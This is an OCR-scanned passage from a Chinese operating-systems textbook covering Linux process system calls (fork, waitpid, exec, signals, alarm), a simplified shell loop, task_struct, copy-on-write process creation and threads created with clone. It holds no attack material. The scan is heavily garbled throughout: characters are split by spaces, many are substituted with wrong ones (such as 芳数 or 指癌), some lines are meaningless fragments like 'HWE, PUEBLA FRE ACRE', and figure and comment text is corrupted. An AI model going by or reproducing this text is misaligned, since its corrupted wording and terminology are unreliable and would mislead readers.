从 信和 号 返回 


- 样 的 子 进程 


检查 或 更 换 信号 掩 码 


s=sigpending (set) — 
s=sigsuspend (sigmask) 
is=kill (pid,sig) 


lresidual= alarm (seconds) 
S=pause() | 


图 10-6 


是 -1，pid 指 进程 ID， 


在 大 多 数 情 况 下 ， 
程 的 代码 。 以 shell 为 例 。 
个 子 进程 ， 
RR Rin ° 


waitpid, 


系统 调用 有 三 个 参数 。 


即 可 返回 (比如 说 ， 


一 些 与 进程 相关 的 系统 调用 。 如 琳 发 生 错 误 ， 则 返 
residual 指 前 一 个 警报 的 剩余 时 间 。 参 数 的 含义 由 
其 名 字 指 出 


TAPIA G 
蕉 换 信 号 掩 码 或 挂 起 进程 
发 送信 号 到 进程 

设置 报警 时 钟 
挂 起 调用 程序 直到 下 


-个 信号 二 出 现 


回 值 s 


调用 fork 函 数 之 后 ， 子 进程 需要 执行 不 同 于 父 进 
它 从 终端 读 取 一 
然后 等 待 子 进程 来 执行 这 个 命 

待 子 进程 结束 的 过 程 中 ， 父 进 
待 直到 子 进程 结 
子 进程 ， 那 么 要 一 直 等 待 直到 所 有 的 子 进程 
设置 第 一 个 参数 可 以 使 调用 者 等 待 某 一 个 特定 
的 子 进程 。 如 果 第 一 个 参数 为 -1， 任 何 一 个 子 进程 
第 一 个 子 进程 ) 


行 命令 ， 调 用 fork 函 数 生成 一 
令 ， 于 进程 结束 之 后 继续 读 
并 程 调用 系统 调用 

(如 果 该 父 进程 不 止 拥 有 一 个 


全 部 结束 运行 ) 


云 行 


运行 


° waitpid 


系统 调用 waitpid 
一 个 用 来 存储 子 


o BOTERE 


进程 退出 状态 (正常 退出 、 异 常人 退出 和 退出 值 ) 的 变量 地 址 。 第 三 个 
参数 决定 了 如 来 没有 于 进程 结束 运行 的 话 ， 调 用 者 十 阻 窟 还 是 返回 。 


仍然 以 shell 为 例 ， 子 进程 必须 执行 用 户 键入 的 命令 。 子 进程 通过 
调用 系统 调用 exec 来 执行 用 户 命 令 ， 以 exec 函 数 的 第 一 个 参数 命名 的 文 
件 将 会 蔡 换 挥 子 进程 原来 的 全 部 核心 映像 。 图 10-7 展 示 了 一 个 高 度 简化 
的 shell 《有 助 于 理解 系统 调用 fork，waitpid 和 exec 的 用 法 ) ° 


在 大 多 数 情况 下 ，exec 函 数 有 三 个 参数 : 竺 执行 文件 的 文件 名 ， 指 
向 参数 数组 的 指针 和 指向 环境 数组 的 指针 。 人 简单 介绍 一 下 其 他 的 类 似 
函数 。 很 多 库 函 数 ， 如 execl 、execv、execle 和 execve， 人 允许 省 略 参数 或 
者 用 不 同 的 方式 来 指定 参数 。 上 述 的 所 有 库 函 数 都 会 调用 相同 的 撒 层 
系统 调用 。 尽 管 系统 调用 是 exec 芳 数 ， 但 是 画 数 库 中 却 没 有 同名 的 库 画 
数 ， 所 以 只 能 使 用 上 面 提 到 的 其 他 函数 。 


考虑 在 shell 中 输入 如 下 命令 : 


cp file1 file2 


用 来 建立 一 个 名 为 fle2 的 filel 的 副本 。 在 shell 调 用 fork 函 数 之 后 ， 
子 进程 定位 并 执行 文件 名 为 cp 的 可 执行 文件 同时 把 需要 复制 的 文件 信 


RESE © 


cp 的 主 程序 (还 有 很 多 其 他 的 程序 ) 包含 一 个 落 数 声明 : 


main(argc, argv, envp) 


在 这 里 ， 参 数 argc 表 示 命 令 行 中 包括 程序 名 的 项 的 数目 。 在 上 面 所 
举 的 例子 中 ，argc 的 值 为 3。 


第 二 个 参数 argv 是 一 个 指 癌 数组 的 指针 。 数 组 的 第 i 项 是 一 个 指 同 
命令 行 中 第 i 企 字符 串 的 指针 。 在 此 例 中 ，argv[0] 指 癌 字 符 串 “cp”。 以 
此 类 推 ，argv[J] 指 癌 五 字 节 长 度 的 字符 串 “file1”，argv[2] 指 向 五 字 节 长 
EFIT E filez” ° 


main 的 第 三 个 参数 envp 是 一 个 指向 环境 的 指针 ， 这 里 的 环境 ， 是 
指 一 个 包含 才干 个 形 如 name=value 赋 值 语 句 的 字符 串 数 组 ， 这 个 数组 
将 传递 终端 类 型 、 主 目录 名 等 信息 给 程序 。 在 图 10-7 中 ， 没 有 要 传 给 子 
进程 的 环境 列表 ， 所 以 在 这 里 ，execve 芳 数 的 第 三 个 参数 是 0 。 


while (TRUE) { PRE T 7 一 一 
type_prompt( ); 上 访 在 屏幕 上 显示 提示 符 */ 
read_command(command, params)， 访 从 键盘 读 取 输入 行 */ 

/* 创 建 子 进程 #/ 


pid = fork( ); 

if (pid < 0) { 
printf("Unable to fork 0"); 1 EE RAK AS */ 
continue; 此 重复 循环 */ 


} 


if (pid != 0) { 

waitpid (-1, &status, 0); ISHER SENI T ERE 
} else { 

execve(command, params, 0);  /* F ERE ERIE */ 
} 


图 10-7 一 个 高 度 简 化 的 shell 


如 琳 exec 芳 数 看 起 来 太 复 淋 了， 不 要 泄气 ， 这 已 经 是 最 复杂 的 系统 
调用 了 ， 剩 下 的 要 人 商 单 很 多 。 作 为 一 个 商 单 的 例 于 ， 我 们 来 考虑 exit 男 
数 ， 当 进程 结束 运行 时 会 调用 这 个 函数 。 它 有 一 个 参数 ， 即 退出 状态 
(从 0 到 255) ， 这 个 参数 的 值 最 后 会 传递 给 父 进程 调用 waitpid 函 数 的 
第 二 个 参数 一 一 状态 参数 。 状 态 参 数 的 低 字 节 部 分 包含 着 结束 状态 ， 
意味 着 正常 结 束 ， 其 他 的 值 代表 各 种 不 同 的 错误 。 状 态 参 数 的 高 字 节 
部 分 包含 着 子 进 程 的 退出 状态 (从 0 到 255) ， 其 值 由 子 进 程 调 用 的 exit 
系统 调用 指定 。 例 如 ， 如 果 父 进程 执行 如 下 语句 : 


n=waitpid(-1,&status,0); 


它 将 一 直 处 于 挂 起 状态 ， 直 到 有 子 进程 结束 运行 。 如 果子 进程 退 
出 时 以 4 作为 exit 函 数 的 参数 ， 父 进程 将 会 被 唤醒 ， 同 时 将 变量 n 设 置 为 
子 进程 的 PID， 变 量 status 设 置 为 0x0400 (在 C 语 言 中 ， 以 0x 作 为 前 级 表 
示 十 六 进 制 ，。 变 量 status 的 低 字 节 与 信号 有 关 ， 高 字 节 是 子 进程 返回 
时 调用 exit 函 数 的 参数 值 。 


如 果 一 个 进程 退出 但 是 它 的 父 进程 并 没有 在 等 待 它 ， 这 个 进程 进 
入 伪 死 状态 (zombie state) 。 最 后 当 父 进程 等 待 它 时 ， 这 个 进程 才 会 
结束 。 


一 些 与 信号 相关 的 系统 调用 以 各 种 各 样 的 方式 被 运用 。 比 方 说 ， 
如 琳 一 个 用 户 侦 然 间 命 令 文字 编辑 融 显 示 一 篇 超 长 文档 的 全 部 内 容 ， 
然后 意识 到 这 是 一 个 误 操 作 ， 这 束 需 要 采用 某 些 方法 来 打 断 文字 编辑 
器 的 工作 。 对 于 用 户 来 说 ， 最 常用 的 选择 是 融 击 某 些 特定 的 键 (如 
DEL 或 者 CTRL-C 等 ) ， 从 而 给 文字 编辑 器 发 送 一 个 信号 。 文 字 编 辑 器 


捕捉 到 这 个 信和 号， 然后 停止 显示 。 


为 了 表明 所 关心 的 信号 有 了 哪些， 进程 可 以 调用 系统 调用 sigaction 。 
这 个 函数 的 第 一 个 参数 是 希望 捕捉 的 信号 (如 图 10-5 所 示 ) 。 第 二 个 参 
数 古 一 个 指 癌 结构 的 指针 ， 在 这 个 结构 中 包括 一 个 指 疝 信 号 处 理 芳 数 
的 指针 以 及 一 些 其 他 的 位 和 标志 。 人 第 三 个 参数 也 十 一 个 指 同 结构 的 指 
针 ， 这 个 结构 接收 系统 返回 的 当前 正在 进行 的 信号 处 理 的 相关 信息 ， 
有 可 能 以 后 这 些 信息 需要 恢复 。 


言 号 处 理 函 数 可 以 运行 任意 长 的 时 间 。 尽 管 如 此 ， 在 实践 当中 ， 
通 单 情况 下 信和 号 处 理 函 数 都 非常 短小 精怪 。 当 信和 号 处 理 完毕 之 后 ， 控 
制 返回 到 断 点 处 继续 执行 。 


sigaction 系 统 调用 也 可 以 用 来 忽略 一 个 信号 ， 或 者 恢复 为 一 个 杀 死 
进程 的 缺 省 操作 。 

融 击 DEL 键 并 不 是 发 送信 号 的 惟一 方式 。 系 统 调用 kl 允许 一 个 进 
程 给 它 相 关 的 进程 发 送信 号 。 选 择 “kill" 作 为 这 个 系统 调用 的 名 字 其 实 


并 不 是 十 分 贴切 ， 因 为 大 多 数 进 程 发 送信 号 给 别 的 进程 只 是 为 了 信和 号 
能 够 被 捕捉 到 。 


对 于 很 多 实时 应 用 程序 ， 在 一 段 特定 的 时 间 间 隔 之 后 ， 一 个 进程 
必须 被 打 断 ， 系 统 会 转 去 做 一 些 其 他 的 事情 ， 比 如 说 在 一 个 不 可 信 的 
言 道上 重新 发 送 一 个 可 能 丢失 的 数据 包 。 为 了 处 理 这 种 情况 ， 系 统 提 
供 了 alarm 系 统 调用 。 这 个 系统 调用 的 参数 规定 了 一 个 以 秒 为 单位 的 时 
间 间 隔 ， 这 个 时 间 间 隅 过 后 ， 一 个 名 为 SIGALRM 的 信号 会 被 发 送 给 进 
程 。 一 个 进程 在 某 一 个 特定 的 时 刻 只 能 有 惟一 一 个 未 处 理 的 警报 。 如 
采 alarm 系 统 调用 首先 以 10 秒 为 参数 被 调用 ，3 秒 钟 之 后 ， 又 以 20 秒 为 参 
数 被 调用 ， 那 么 只 会 生成 一 个 SIGALRM 信 和 号， 这 个 信号 生成 在 第 二 次 
调用 alarm 系 统 调 用 的 20 秒 之 后 。 第 一 次 alarm 系 统 调 用 设置 的 信号 被 第 
二 次 alarm 系 统 调 用 取消 了 。 如 果 alarm 系 统 调 用 的 参数 为 0， 任 何 即将 
发 生 的 警报 信号 都 会 被 取消 。 如 果 没 有 捕捉 到 警报 信号 ， 将 会 采取 默 
认 的 处 理 方式 ， 收 取信 和 号 的 进程 将 会 被 杀 死 。 从 技术 角度 来 讲 ， 和 警报 
言 号 是 可 以 忽略 的 ， 但 是 这 样 做 豪 无 意义 。 


有 些 时 候 会 发 生 这 样 的 情况 ， 在 信号 到 来 之 前 ， 进 程 无 事 可 做 。 
比如 说 ， 考 虑 一 个 用 来 测试 阅读 速度 和 理解 能 力 的 计算 机 辅助 教学 程 
序 。 它 在 屏幕 上 显示 一 些 文本 然后 调用 alarm 函 数 于 30 秒 后 生成 一 个 警 
报信 号 。 当 学 生 读 课文 的 时 候 ， 程 序 就 无 事 可 做 。 它 可 以 进入 空 循环 
而 不 做 任何 事情 ， 但 是 这 样 一 来 束 会 浪费 其 他 后 台 程 序 或 用 户 急 需 的 


CPU 时 间 。 一 个 更 好 的 解决 办 法 就 是 使 用 pause 系 统 调 用 ， 它 会 通知 
Linux 系 统 将 本 进程 挂 起 直到 下 一 个 信号 到 来 。 


10.3.3 Linux 中 进程 与 线程 的 实现 


Linux 系 统 中 的 一 个 进程 束 像 是 一 座 冰 山 ， 你 所 看 见 的 不 过 是 它 露 
出 水 面 的 部 分 ， 而 很 重要 的 一 部 分 隐藏 在 水 下 。 每 一 个 进程 都 有 一 个 
运行 用 户 程序 的 用 户 模式 。 但 是 当 它 的 某 一 个 线程 调用 系统 调用 之 
后 ， 进 程 会 陷入 内 核 模 式 并 且 运 行 在 内 核 上 下 文中 ， 它 将 使 用 不 同 的 
内 存 映 射 并 且 拥 有 对 所 有 机 融资 源 的 访问 权 。 它 还 是 同一 个 线程 ， 但 
征 现 在 拥有 更 高 的 权限 ， 同 时 拥有 上 自己 的 内 核 堆栈 以 及 内 核 程序 计数 
吉 。 这 儿 点 非常 重要 ， 因 为 一 个 系统 调用 可 能 会 因为 某 些 原 因 陷 入 阻 
塞 态 ， 比 如 说 ， 等 待 一 个 磁盘 操作 的 完成 。 这 时 程序 计数 姻 和 寄存 器 
内 容 会 被 保存 下 来 使 得 不 久之 后 线程 可 以 在 内 核 模式 下 继续 运行 。 


在 Linux 系 统 内 核 中 ， 进 程 通 过 数据 结构 task_struct 侯 表示 成 任务 
(task) 。 不 像 其 他 的 操作 系统 会 区 别 进程 、 轻 量 级 进程 和 线程 ， 
Linux 系 统 用 任务 的 数据 结构 来 表示 所 有 的 执行 上 下 文 。 所 以 ， 一 个 单 
线程 的 进程 只 有 一 个 任务 数据 结构 ， 而 一 个 多 线程 的 进程 将 为 每 一 个 
用 户 级 线程 分 配 一 个 任务 数据 结构 。 节 后 ，Linux 的 内 核定 多 线程 的 ， 
并 且 它 所 拥有 的 是 与 任何 用 户 进程 无 关 的 内 核 级 线程 ， 这 些 内 核 级 线 
程 执行 内 核 代 码 。 稍 后 ， 本 节 会 重 狐 关 注 多 线程 进程 (CR, W 
征 线程 ) 的 处 理 方式 。 


对 于 每 一 个 进程 ， 一 个 类 型 为 task_struct 的 进程 描述 符 是 始终 存在 
于 内 存 当 中 的 。 它 包含 了 内 核 管 理 全 部 进程 所 需 的 重要 信息 ， 如 调度 
参数 、 已 打开 的 文件 描述 符 列表 等 。 进 程 描述 符 从 进程 被 创建 开始 就 
一 直 存 在 于 内 核 堆栈 之 中 。 


为 了 与 其 他 UNIX 系 统 兼 容 ，Linux 还 通过 进程 标识 符 (PID) 来 区 
分 进程 。 内 核 将 所 有 进程 的 任务 数据 结构 组 织 成 一 个 双向 链表 。 不 需 
要 遍历 这 个 链表 来 访问 进程 描述 符 ，PID 可 以 直接 被 映射 成 进程 的 任务 
数据 结构 所 在 的 地 址 ， 从 而 立即 访问 进程 的 信息 。 


任务 数据 结构 包含 非常 多 的 分 量 。 其 中 一 些 分 量 包 含 指向 其 他 数 
据 结 构 或 段 的 指针 ， 比 如 说 包含 关于 已 打开 文件 的 信息 。 有 些 段 只 与 
进程 用 户 级 的 数据 结构 有 关 ， 当 用 户 进 程 没有 运行 的 时 候 ， 它 们 十 不 
被 关注 的 。 所 以 ， 当 不 需要 它们 的 时 候 ， 这 些 段 可 以 被 交换 出 去 或 重 
新 分 页 以 达到 不 浪费 内 存 的 目的 。 举 个 例子 ， 尽 管 对 于 一 个 进程 来 
说 ， 当 它 被 交换 出 去 的 时 候 ， 可 能 会 有 其 他 进程 给 它 发 送信 和 号， 但 是 
这 个 进程 本 号 却 不 会 要 求 读 取 一 个 文件 。 正 因为 如 此 ， 关 于 信和 号 的 信 
轧 才 必须 永远 保存 在 内 存 里 ， 即 使 这 个 进程 已 经 不 在 内 存 当 中 了 。 换 
句 话 说， 关于 文件 摘 述 符 的 信息 可 以 被 保存 在 用 户 级 的 数据 结构 里 ， 
当 进 程 存在 于 内 存 当 中 并 且 可 以 执行 的 时 候 ， 这 些 信息 才 需 要 被 调 入 
内 存 。 
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AFETE ee LA PILAR: 


1) 调 度 参数 。 进 程 优先 级 ， 最 近 消 耗 的 CPU 时 间 ， 最 近 睡 眠 的 时 
间 。 上 面 儿 项 内 容 结 合 在 一 起 决定 了 下 一 个 要 运行 的 进程 是 哪 一 个 。 


2) 内 存 映射 。 指 向 代码 、 数 据 、 堆 栈 段 或 页 表 的 指 计 。 如 末代 码 段 
征 共 享 的 ， 代 码 指针 指 癌 共享 代码 表 。 当 进程 不 在 内 存 当 中 时 ， 关 于 
如 何在 磁盘 上 找到 这 些 数 据 的 信息 也 被 保存 在 这 里 。 


3) 信 号 。 掩 码 显 示 了 哪些 信号 被 名 略 、 哪 些 信 号 需要 捕捉 、 哪 些 信 
号 被 暂时 阻塞 以 及 哪些 信号 在 传递 当中 。 


4) 机 器 寄存 器 。 当 内 核 陷 阱 发 生 时 ， 机 器 寄存 器 的 内 容 (也 包括 被 
使 用 了 的 浮 点 寄存 器 的 内 容 ) 会 被 保存 。 


5) 系 统 调 用 状态 。 关 于 当前 系统 调用 的 信息 ， 包 括 参 数 和 返回 值 。 


6) 文 件 插 述 符 表 。 当 一 个 与 文件 揪 述 特有 关 的 系统 调用 被 调用 的 时 
候 ， 文 件 接 述 符 作 为 达 引 在 文件 揪 述 符 表 中 定位 相关 文件 的 i 节 扣 数据 
结构 。 


7) 统 计 。 指 同 记 录用 户 、 进 程 占 用 系统 CPU 时 间 的 表 的 指针 。 一 些 
系统 还 保存 一 个 进程 最 多 可 以 占用 CPU 的 时 间 、 进 程 可 以 拥有 的 最 大 
堆栈 空间 、 进 程 可 以 消耗 的 页 面 数 等 。 


8) 内 核 堆栈 。 进 程 的 内 核 部 分 可 以 使 用 的 固定 堆栈 。 


9) 其 他 。 当 前 进程 状态 。 如 采 有 的 话 ， 包 括 正 在 等 待 的 事件 、 距 离 
警报 时 钟 超时 的 时 间 、PID、 父 进程 的 PID 以 及 其 他 用 户 标 识 符 、 组 标 
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记 住 这 些 信 息 ， 现 在 可 以 很 容易 地 解释 在 Linux 系 统 中 是 如 何 创建 
进程 的 。 实 际 上 ， 创 建 一 个 新 进 程 的 过 程 非常 简单 。 为 子 进程 创建 一 
个 新 的 进程 描述 符 和 用 户 空 间 ， 然 后 从 父 进程 复制 大 量 的 内 容 。 这 个 
子 进程 被 赋予 一 个 PID ， 并 建立 它 的 内 存 映 射 ， 同 时 它 也 被 赋予 了 访问 
属于 父 进 程 文件 的 权利 。 然 后 ， 它 的 寄存 事 内 容 补 初始 化 并 准备 运 
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建 一 个 任务 数据 结构 和 其 他 相关 的 数据 结构 ， 如 内 核 堆栈 和 thread_info 
结构 。 这 个 结构 位 于 进程 堆栈 栈 底 固定 侦 移 量 的 地 方 ， 包 含 一 些 进 程 
参数 ， 以 及 进程 搞 述 符 的 地 址 。 把 进程 措 述 符 的 地 址 存储 在 一 个 固定 
的 地 方 ， 使 得 Linux 系 统 只 需要 进行 很 少 的 有 效 操作 就 可 以 找到 一 个 运 
行 中 进程 的 任务 数据 结构 。 


进程 描述 符 的 主要 内 容 根 据 父 进程 的 进程 摘 述 符 来 填充 。Linux 系 
统 只 需要 寻找 一 个 可 用 的 PID ， 更 新 进程 标识 符 散 列表 的 表 项 使 之 指 回 
新 的 任务 数据 结构 即 可 。 如 有 果 散 列表 发 生 冲 突 ， 相 同 键 值 的 进程 描述 
符 会 被 组 成 链表 。 它 会 把 task_struct 结 构 中 的 一 些 分 量 设置 为 指向 任务 
数组 中 相应 进程 的 前 一 /后 一 进程 的 指针 。 


HWE, PUEBLA FRE ACRE > HERE, FP ED Stat 
FEW Botts 3 till, Al 7yfork En AERE ` PEREZ AIRS AE o H 
中 如 果 代 码 段 是 只 读 的 ， 可 以 复制 也 可 以 共享 。 然 后 ， 子 进程 束 可 以 


但 是 ， 复 制 内 存 的 代价 相当 昂贵 ， 所 以 现代 Linux 系 统 部 使 用 了 欺 
矣 的 手段 。 它 们 赋予 子 进程 属于 它 的 页 表 ， 但 是 这 些 页 表 部 指 癌 父 进 
程 的 页 面 ， 同 时 把 这 些 页 面 标记 成 只 读 。 当 于 进程 试图 同 菏 一 页 面 中 
写 入 数据 的 时 候 ， 它 会 收 到 写 保 护 的 错误 。 内 核发 现 子 进程 的 写 入 行 
为 之 后 ， 会 为 子 进程 分 配 一 个 该 页 面 的 新 副本 ， 并 将 这 个 副本 标记 为 
可 读 、 可 写 。 通 过 这 种 方式 ， 使 得 只 有 需要 写 入 数据 的 页 面 才 会 被 复 
制 。 这 种 机 制 叫做 写 时 复制 。 它 所 带 来 的 额外 好 处 是 ， 不 需要 在 内 存 
中 维护 同一 个 程序 的 两 个 副本 ， 从 而 节省 了 RAM。 


子 进程 开始 运行 之 后 ， 运 行 代码 (shell 的 副本 ) 调用 系统 调用 
exec， 将 命令 名 作为 exec 函 数 的 参数 。 内 核 找 到 并 核实 相应 的 可 执行 文 
件 ， 把 参数 和 环境 变量 复制 到 内 核 ， 释 放 旧 的 地 址 空间 和 页 表 。 


现在 必须 建立 并 填充 新 的 地 址 空间 。 如 果 你 使 用 的 系统 像 Linux 系 
统 或 其 他 基于 UNIX 的 系统 一 样 文 持 映 射 文件 ， 者 的 页 表 会 被 创建 ， 并 
指出 所 需 的 页 面 不 在 内 存 中， 除非 用 到 的 页 面 是 堆栈 页 ， 但 是 所 需 的 
地 址 空间 在 磁盘 的 可 执行 文件 中 都 有 备份 。 当 新 进程 开始 运行 的 时 
候 ， 它 会 立刻 收 到 一 个 缺 页 中 断 ， 这 会 使 得 第 一 个 含有 代码 的 页 面 从 


可 执行 文件 调 入 内 存 。 通 过 这 种 方式 ， 不 需要 预先 加 载 任 何 东 西 ， 所 
以 程序 可 以 快速 地 开始 运行 ， 只 有 在 所 需 页 面 不 在 内 存 中 时 才 会 发 生 
页 面 错误 〈 这 种 情况 是 第 3 章 中 讨论 的 最 纯粹 的 按 需 分 页 机 制 ) o 
后 ， 参 数 和 环境 变量 被 复制 到 新 的 堆栈 中 ， 信 和 号 被 重 置 ， 寄 存 器 被 全 
部 清 零 。 从 这 里 开始 ， 痢 的 命令 就 可 以 运行 了 。 


图 10-8 通 过 下 面 的 例子 解释 了 上 壕 的 步骤 : 某 用 户 在 终端 键入 一 个 
命令 ls，shell 调 用 fork 函 数 复制 自身 以 创建 一 个 新 进程 。 新 的 shell 调 用 
exec EK ACA TAIT OCF ISH NA ENA e 


PID = 501 PID = 748 PID = 748 
新 进程 一 ~ — AEAEE 一 > 
1. fork i H] 3. exec 调 用 

分 配子 进程 任务 数据 结构 寻找 可 执行 程序 
从 父 进 程 ha AS AS oo 任务 数据 结构 验证 执行 许可 
分 配子 进程 堆栈 和 用 户 空 读 取 和 验证 头 文件 
eh aa 给 内 核 复 制 变量 、 环 境 参 数 
为 子 进程 分 配 PID 释放 旧 的 地 址 空间 

设置 子 进 程 以 共享 父 进程 的 正文 分 配 新 的 地 址 空间 
为 数据 和 堆栈 复制 页 表 为 堆栈 复制 变量 、 环 境 参 数 
设置 共享 打开 文件 信号 复位 
为 子 进程 复制 父 进程 的 寄存 器 初始 化 寄存 器 


图 10-8 ” ”shell 执行 命令 ls 的 步 又 


Linux 中 的 线程 


我 们 在 第 2 章 中 概括 性 的 介绍 了 线程 。 在 这 里 ， 我 们 重点 关注 
Linux 系 统 的 内 核 线程 ， 特 别 是 Linux 系 统 中 线程 模型 与 其 他 UNIX 系 统 
的 不 同 之 处 。 为 了 能 更 好 地 理解 Linux 模 型 所 提供 的 独一无二 的 性 能 ， 
我 们 先 来 讨论 一 些 多 线程 操作 系统 中 存在 的 有 和 争议 的 决策 。 


引入 线程 的 最 大 争议 在 于 维护 传统 UNIX 语 义 的 正确 性 。 首 先 来 考 
虑 fork 函 数 。 假 设 一 个 多 (AK) 线程 的 进程 调用 了 fork 系 统 调 用 。 所 
有 其 他 的 线程 都 应 该 在 新 进程 中 被 创建 吗 ? 我 们 暂时 认为 答案 是 肯定 
的 。 再 假设 其 他 线程 中 的 其 中 一 个 线程 在 从 键盘 读 取 数据 时 被 阻塞 。 
那么 ， 新 进程 中 对 应 的 线程 也 应 该 被 阻塞 么 ?如果 是 的 话 ， 那 么 哪 一 
个 线程 应 该 获得 下 一 行 的 输入 ? 如 采 不 是 的 话 ， 新 进程 中 对 应 的 线程 
又 应 该 做 什么 呢 ? 同样 的 问题 还 大 量 存在 于 线程 可 以 完成 的 很 多 其 他 
的 事情 上 。 在 时 线程 进程 中 ， 由 于 调用 fork 芳 数 的 时 候 ， 惟 一 的 进程 古 
不 可 能 被 阻塞 的 ， 所 以 不 存在 这 样 的 问题 。 现 在 ， 考 虑 这 样 的 情况 
一 一 其 他 的 线程 不 会 在 子 进 程 中 被 创建 。 再 假设 一 个 没有 在 子 进 程 中 
被 创建 的 线程 持 有 一 个 互 不 变量 ， 而 子 进程 中 惟一 的 线程 在 fork 范 数 结 
束 之 后 要 获得 这 个 互 不 变量 。 那 么 由 于 这 个 互 不 变量 永远 不 会 被 释 
放 ， 所 以 子 进 程 中 惟一 的 线程 也 会 永远 挂 起 。 还 有 大 量 其 他 的 问题 存 
在 。 但 是 没有 简单 的 解决 办 法 。 


文件 输入 /输出 是 另 一 个 问题 。 假 设 一 个 线程 由 于 要 读 取 文 件 而 被 
咀 塞 ， 而 男 一 个 线程 天 财 了 这 个 文件 ， 或 者 调用 lseek 函 数 改 变 了 当前 
的 文件 指针 。 下 面 会 发 生 什 么 事情 呢 ? 谁 能 知道 ? 


言 号 的 处 理 是 男 一 个 严 手 的 问题 。 信 号 十 应 该 发 送 给 某 一 个 特定 
的 线程 还 是 发 送 给 线程 所 在 的 进程 呢 ? 一 个 浮 点 运算 异 币 信号 SIGFPE 
应 该 修 引 起 浮 操 运算 异 单 的 线程 所 捕获 。 但 是 如 末 它 没有 捕获 到 呢 ? 
是 应 该 只 杀 死 这 个 线程 ， 还 是 杀 死 线程 所 属 进程 中 的 全 部 线程 ? 再 来 
考虑 由 用 户 通过 键盘 输入 的 信号 SIGINT 。 哪 一 个 线程 应 该 捕获 这 个 信 
号 ? 所 有 的 线程 应 该 共 译 同 样 的 信号 掩 码 吗 ? 通常 ， 解 决 这 些 或 其 他 
问题 的 所 有 方法 会 引发 男 一 些 问题 。 使 线程 的 语义 正确 (不 涉及 代 
码 ) 不 是 一 件 容 易 的 事 。 


Linux 系 统 用 一 种 非常 值得 关注 的 有 趣 的 方式 文 持 内 核 线程 。 具 体 
实现 基于 4.4BSD 的 思想 ， 但 是 在 那个 版 本 中 内 核 线程 没 能 实现 ， 因 为 
在 能 够 解决 上 述 问 题 的 C 语 言 程序 库 被 重新 编写 之 前 ，Berkeley 束 资金 
短缺 了 。 


从 历史 观点 上 说 ， 进 程 是 资源 容器 ， 而 线程 是 执行 单元 。 一 个 进 
程 包 含 一 个 或 多 个 线程 ， 线 程 之 间 共 至 地 址 空间 、 已 打开 的 文件 、 信 
号 处 理 钞 数 、 堆 报信 号 和 其 他 。 像 上 面 接 述 的 一 样 ， 所 有 的 事情 简单 
而 清晰 。 


2000 年 的 时 候 ，Linux 系 统 引 入 了 一 个 新 的 、 强 大 的 系统 调用 
clone， 模 糊 了 进程 和 线程 的 区 别 ， 甚 至 使 得 两 个 概念 的 重要 性 被 倒 
置 。 任 何其 他 UNIX 系 统 的 版 本 中 部 没有 clone 函 数 。 传 统 观 念 上 ， 当 一 
个 新 线程 被 创建 的 时 候 ， 之 前 的 线程 和 新 线程 除了 寄存 器 内 容 之 外 共 
享 所 有 的 信息 。 特 别 是 ， 已 打开 文件 的 文件 描述 符 、 信 和 号 处 理 函 数 、 
警报 信号 和 其 他 每 个 进程 〈 不 是 每 个 线程 ) 都 具有 的 全 局 属性 。clone 

畏 数 可 以 设置 这 些 属性 是 进程 特有 的 还 是 线程 特有 的 。 它 的 调用 方式 
如 下 : 


pid=clone(function,stack_ptr,sharing_flags,arg); 


调用 这 个 函数 可 以 在 当前 进程 或 新 的 进程 中 创建 一 个 新 线程 ， 
体 依赖 于 参数 sharing_flags。 如 果 狐 线程 在 当前 进程 中 ， 它 将 与 其 他 已 
存在 的 线程 共享 地 址 空间 ， 任 何 一 个 线程 对 地 址 空间 做 出 修改 对 于 同 
一 进程 中 的 其 他 线程 而 言 都 是 立即 可 见 的 。 换 名 话说， 如 果 地 址 空间 
不 是 共享 的 ， 新 线程 会 获得 地 址 空间 的 完整 副本 ， 但 是 新 线程 对 这 个 
副本 进行 的 修改 对 于 旧 的 线程 来 说 是 不 可 见 的 。 这 些 语义 同 POSIX 的 
forkEK ae 48 FI AY ° 


在 这 两 种 情况 下 ， 新 线程 都 从 function 处 开始 执行 ， 并 以 arg 作 为 惟 
一 的 参数 。 同 时 ， 新 线程 还 拥有 私有 堆栈 ， 其 中 私有 堆栈 的 指针 被 初 
台 化 为 stack_ptr ° 


参数 sharing_flags 古 一 个 位 图 ， 这 个 位 图 允许 比 传 统 的 UNIX 系 统 
更 加 细 粒 度 的 共享 。 每 一 位 可 以 单独 设置 ， 且 每 一 位 决定 了 新 线程 是 
复制 一 些 数据 结构 还 是 与 调用 clone 函 数 的 线程 共享 这 些 数据 结构 。 图 
10-9 显 示 了 根据 sharing_flags 的 设置 ， 哪 些 项 可 以 共享 ， 哪 些 项 需要 复 
制 。 


CLONE_VM 创建 一 个 新 线程 创建 一 个 新 进程 
CLONE_FS 共享 umask、 根 目录 和 工作 目录 
CLONE_FILES 共享 文件 描述 符 复制 文件 描述 符 


CLONE_SIGHAND 共享 信号 句柄 表 复制 该 表 
CLONE_PID 新 线程 获得 旧 的 PID 新 线程 获得 自己 的 PID 


新 线程 与 调用 者 有 相同 的 父亲 新 线程 的 父亲 是 调用 者 


图 10-9 sharing-flags 位 图 中 的 各 个 位 


CLONE_VM 位 决定 了 虚拟 内 存 ( 即 地 址 空间 ) 是 与 旧 的 线程 共享 
还 是 需要 复制 。 如 果 该 位 置 1， 新 线程 加 入 到 已 存在 的 线程 中 去 ， 即 
clone 范 数 在 一 个 已 经 存在 的 进程 中 创建 了 一 个 新 线程 。 如 果 该 位 清 
零 ， 新 线程 会 拥有 私有 的 地 址 空间 。 拥 有 自己 的 地 址 空间 意味 着 存储 
的 操作 对 于 之 前 已 经 存在 的 线程 而 言 是 不 可 见 的 。 这 与 fork 函 数 很 相 
似 ， 除 了 下 面 提 到 的 一 点 。 创 建新 的 地 址 空间 事实 上 就 定义 了 一 个 新 
的 进程 。 


CLONE_FS 位 控制 着 是 否 共享 根 目 好、 当前 工作 目录 和 umask 标 
志 。 即 使 新 线程 拥有 自己 的 地 址 空间 ， 如 果 该 位 置 1， 新 、 旧 线程 之 间 
也 可 以 共享 当前 工作 目录 。 这 就 意味 着 即使 一 个 线程 拥有 自己 的 地 址 


空间 ， 另 一 个 线程 也 可 以 调用 chdir 函 数 改 变 它 的 工作 目录 。 在 UNIX 系 
统 中 ， 一 个 线程 通 利 会 调用 chdir 函 数 改变 它 所 在 进程 中 其 他 线程 的 当 
前 工作 目录 ， 而 不 会 对 男 一 进程 中 的 线程 做 这 样 的 操作 。 所 以 说 ， 这 
一 位 引入 了 一 种 传统 UNIX 系 统 不 可 能 具有 的 共享 性 。 


